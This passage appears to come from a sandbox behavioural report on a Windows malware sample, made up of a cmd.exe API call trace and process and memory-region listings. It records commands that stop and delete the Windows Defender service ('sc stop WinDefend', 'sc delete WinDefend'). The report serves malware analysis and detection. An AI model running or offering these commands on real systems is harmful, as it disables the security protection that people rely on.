(_String1="KEYS", _String2="CD") returned 8 [0140.412] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.412] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.412] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.412] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.412] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.412] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.412] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.412] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fc00 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x28fc00, lpFilePart=0x28fbfc | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x28fbfc*="system32") returned 0x13 [0140.413] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0140.413] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x28f97c | out: lpFindFileData=0x28f97c) returned 0x5907f0 [0140.413] FindClose (in: hFindFile=0x5907f0 | out: hFindFile=0x5907f0) returned 1 [0140.413] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x28f97c | out: lpFindFileData=0x28f97c) returned 0x5907f0 [0140.413] FindClose (in: hFindFile=0x5907f0 | out: hFindFile=0x5907f0) returned 1 [0140.413] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0140.413] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0140.413] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0140.413] GetEnvironmentStringsW () returned 0x5a2168* [0140.413] FreeEnvironmentStringsW (penv=0x5a2168) returned 1 [0140.413] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.414] GetConsoleOutputCP () returned 0x1b5 [0140.414] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0140.414] GetUserDefaultLCID () returned 0x409 [0140.414] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a0b4950, cchData=8 | out: lpLCData=":") returned 2 [0140.414] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd40, cchData=128 | out: lpLCData="0") returned 2 [0140.414] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fd40, cchData=128 | out: lpLCData="0") returned 2 [0140.414] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fd40, cchData=128 | out: lpLCData="1") returned 2 [0140.414] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a0b4940, cchData=8 | out: lpLCData="/") returned 2 [0140.414] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a0b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a0b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a0b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a0b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a0b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a0b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a0b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a0b4930, cchData=8 | out: lpLCData=".") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a0b4920, cchData=8 | out: lpLCData=",") returned 2 [0140.415] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.416] GetConsoleTitleW (in: lpConsoleTitle=0x591030, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0140.498] GetProcAddress (hModule=0x76220000, lpProcName="CopyFileExW") returned 0x76253b92 [0140.498] GetProcAddress (hModule=0x76220000, lpProcName="IsDebuggerPresent") returned 0x76234a5d [0140.499] GetProcAddress (hModule=0x76220000, lpProcName="SetConsoleInputExeNameW") returned 0x7624a79d [0140.499] _wcsicmp (_String1="sc", _String2=")") returned 74 [0140.499] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0140.499] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0140.499] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0140.499] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0140.499] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0140.499] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0140.500] GetConsoleTitleW (in: lpConsoleTitle=0x28fa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.500] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0140.500] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0140.500] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0140.500] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0140.501] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0140.501] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0140.501] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0140.501] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0140.501] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0140.501] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0140.501] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0140.501] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0140.501] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0140.501] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0140.501] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0140.501] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0140.501] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0140.501] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0140.501] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0140.501] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0140.501] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0140.501] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0140.501] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0140.501] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0140.501] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0140.501] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0140.501] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0140.501] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0140.501] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0140.501] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0140.501] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0140.501] _wcsicmp (_String1="sc", _String2="START") returned -17 [0140.501] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0140.501] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0140.501] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0140.501] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0140.501] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0140.501] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0140.501] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0140.501] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0140.502] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0140.502] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0140.502] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0140.502] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0140.502] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0140.502] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0140.502] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0140.502] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0140.502] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0140.502] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0140.502] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0140.502] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0140.502] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0140.502] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0140.502] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0140.502] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0140.502] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0140.502] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0140.502] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0140.502] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0140.502] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0140.502] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0140.502] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0140.502] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0140.502] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0140.502] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0140.502] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0140.502] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0140.502] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0140.502] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0140.502] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0140.502] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0140.502] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0140.502] _wcsicmp (_String1="sc", _String2="START") returned -17 [0140.502] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0140.502] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0140.503] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0140.503] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0140.503] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0140.503] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0140.503] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0140.503] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0140.503] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0140.503] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0140.503] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0140.503] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0140.503] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0140.503] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0140.503] SetErrorMode (uMode=0x0) returned 0x0 [0140.503] SetErrorMode (uMode=0x1) returned 0x0 [0140.503] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a4cb0, lpFilePart=0x28f558 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x28f558*="system32") returned 0x13 [0140.503] SetErrorMode (uMode=0x0) returned 0x1 [0140.504] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.504] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.509] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.510] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x28f2d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f2d4) returned 0x5a4f78 [0140.511] FindClose (in: hFindFile=0x5a4f78 | out: hFindFile=0x5a4f78) returned 1 [0140.511] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x28f2d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f2d4) returned 0xffffffff [0140.511] GetLastError () returned 0x2 [0140.511] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x28f2d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f2d4) returned 0x5a4f78 [0140.511] FindClose (in: hFindFile=0x5a4f78 | out: hFindFile=0x5a4f78) returned 1 [0140.511] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0140.511] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0140.511] GetConsoleTitleW (in: lpConsoleTitle=0x28f7cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.511] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f654, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f71c | out: lpAttributeList=0x28f654, lpSize=0x28f71c) returned 1 [0140.511] UpdateProcThreadAttribute (in: lpAttributeList=0x28f654, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f654, lpPreviousValue=0x0) returned 1 [0140.511] GetStartupInfoW (in: lpStartupInfo=0x28f610 | out: lpStartupInfo=0x28f610*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.512] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.513] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.513] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.513] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.513] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0140.513] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0140.513] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0140.514] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x28f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc stop WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f6fc | out: lpCommandLine="sc stop WinDefend", lpProcessInformation=0x28f6fc*(hProcess=0x78, hThread=0x74, dwProcessId=0xa6c, dwThreadId=0xa7c)) returned 1 [0140.517] CloseHandle (hObject=0x74) returned 1 [0140.517] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0140.517] GetEnvironmentStringsW () returned 0x5a3f18* [0140.518] FreeEnvironmentStringsW (penv=0x5a3f18) returned 1 [0140.518] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0141.120] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x28f5f0 | out: lpExitCode=0x28f5f0*=0x0) returned 1 [0141.120] CloseHandle (hObject=0x78) returned 1 [0141.120] _vsnwprintf (in: _Buffer=0x28f738, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f5fc | out: _Buffer="00000000") returned 8 [0141.120] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0141.120] GetEnvironmentStringsW () returned 0x5a5208* [0141.120] FreeEnvironmentStringsW (penv=0x5a5208) returned 1 [0141.120] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0141.120] GetEnvironmentStringsW () returned 0x5a5208* [0141.120] FreeEnvironmentStringsW (penv=0x5a5208) returned 1 [0141.120] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f654 | out: lpAttributeList=0x28f654) [0141.120] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.120] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.121] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0141.121] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0141.121] SetConsoleInputExeNameW () returned 0x1 [0141.121] GetConsoleOutputCP () returned 0x1b5 [0141.121] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0141.121] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.121] exit (_Code=0) Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1b91000" os_pid = "0x600" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x668" cmd_line = "/c sc delete WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2557 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2558 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2559 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2560 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2561 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2562 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2563 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2564 start_va = 0x4a090000 end_va = 0x4a0dbfff entry_point = 0x4a090000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2565 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2566 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2567 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2568 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2569 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2570 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2571 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2572 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2573 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2574 start_va = 0xa0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2575 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2576 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2577 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3041 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3042 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3043 start_va = 0x120000 end_va = 0x186fff entry_point = 0x120000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3044 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 3045 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3046 start_va = 0x754b0000 end_va = 0x754b6fff entry_point = 0x754b0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 3047 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3048 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3049 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3050 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3051 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3052 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3053 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3054 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = 